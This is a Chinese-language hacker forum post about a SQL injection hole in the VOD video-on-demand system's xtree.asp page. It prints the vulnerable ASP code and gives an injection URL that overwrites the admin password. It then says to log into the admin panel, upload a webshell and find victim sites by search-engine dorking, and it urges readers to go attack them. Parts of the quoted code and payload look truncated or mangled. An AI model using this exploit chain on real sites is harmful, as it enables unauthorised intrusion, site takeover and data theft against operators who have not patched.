哎!!!VOD 點播系統的緻命漏洞,又要又很多的電影網站完蛋了。。。。。
偶是偶然看見的,嘿嘿,現在再網上你是很難找到的哦。。。。
貌似現在隻流傳再内部,不過好多的網站已經修補了,畢竟破壞力比較大哦。。。
嘿嘿,下面就給大家看點好東西哦,,,
漏洞檔案webmedia/common/function/xtree.asp
〈!--#include file="../dbcon.inc.asp" -->
〈%
iNode_ID = Request.QueryString("id")
if Len(Session("SuperAdmin")) > 0 or Len(Session("LIVEAdmin")) > 0 or Len(Session
("VODAdmin")) > 0 then
szSQL = "Select Type_ID,ParentID,TypeName FROM TypeInfo Where Type_ID>=20 AND ParentID=" &
iNode_ID
else
szSQL = "Select Type_ID,ParentID,TypeName FROM TypeInfo Where Type_ID>20 AND ParentID=" &
end if
rsData.Open szSQL,con,1,3
szRetVar = "<?xml version='1.0' encoding='GB2312'?><Root>"
do while not rsData.EOF
szRetVar = szRetVar & "<TypeInfo>"
szRetVar = szRetVar & "<IDN>" & rsData("Type_ID") & "</IDN>"
szRetVar = szRetVar & "<ParentID>" & rsData("ParentID") & "</ParentID>"
szRetVar = szRetVar & "<TypeName>" & Replace(rsData("TypeName"), "&", "&") & "</TypeName>"
szRetVar = szRetVar & "</TypeInfo>"
rsData.MoveNext
loop
szRetVar = szRetVar & "</Root>"
rsData.Close
Response.CharSet = "GB2312"
Response.C
Response.Expires = -1
Response.Write szRetVar
%>
〈!--#include file="../dbend.inc.asp" -->
很容易看出以上存在着DB權限注入
注射位址:[url]http://WWWW.XXXXX.COM/webmedia/common/function/xtree.asp?id=1[/url]
表段名:customer
構造函數 把admin的pass改成fuck
[url]http://WWWW.XXXXX.COM/webmedia/common/function/xtree.asp?id=1;update%20customer%20set%20Userfuck=[/url]'633f94d350db34d5'%20where%20UserName='fuck'
登陸背景[url]http://WWWW.XXXXX.COM/webmedia/admin/default.asp[/url] 直接上傳大馬 完事!
測試方法:在google baidu搜: inurL:webmedia/ 随便找個站都可以入侵
官方位址:[url]http://www.viewgood.com/[/url]
速度去看看了,。。。。 嘿嘿,小黑們,你們又發了哦。。。
上面說的第一個是注射位址,,,,
第二個是 添加一個 FUCK 密碼 FUCK的管理者,。。。。。。
嘿嘿,,,,,速度去了,。。。。。